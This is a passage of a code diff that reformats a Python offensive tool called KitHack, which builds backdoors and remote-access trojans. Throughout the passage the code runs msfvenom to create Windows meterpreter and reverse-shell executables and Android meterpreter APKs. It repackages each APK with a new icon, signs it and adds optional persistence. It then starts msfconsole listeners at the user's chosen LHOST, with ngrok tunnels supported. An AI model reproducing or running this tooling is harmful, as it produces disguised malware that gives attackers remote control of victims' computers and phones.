MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2605,55 +2086,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2663,55 +2134,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2721,55 +2182,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2779,55 +2230,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2837,55 +2278,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2895,55 +2326,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.exe".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "{}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -2958,12 +2379,18 @@ def main(): elif sys == "03": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print("{0}[01]{1} android/meterpreter_reverse_http".format(WHITE, YELLOW)) - print("{0}[02]{1} android/meterpreter_reverse_https".format(WHITE, YELLOW)) - print("{0}[03]{1} android/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[04]{1} android/meterpreter/reverse_tcp".format(WHITE, YELLOW)) - print("{0}[05]{1} android/shell/reverse_http".format(WHITE, YELLOW)) - print("{0}[06]{1} android/shell/reverse_https".format(WHITE, YELLOW)) + print("{0}[01]{1} android/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} android/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} android/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} android/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} android/shell/reverse_http".format( + WHITE, YELLOW)) + print("{0}[06]{1} android/shell/reverse_https".format( + WHITE, YELLOW)) print("{0}[07]{1} android/shell/reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -2979,471 +2406,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, 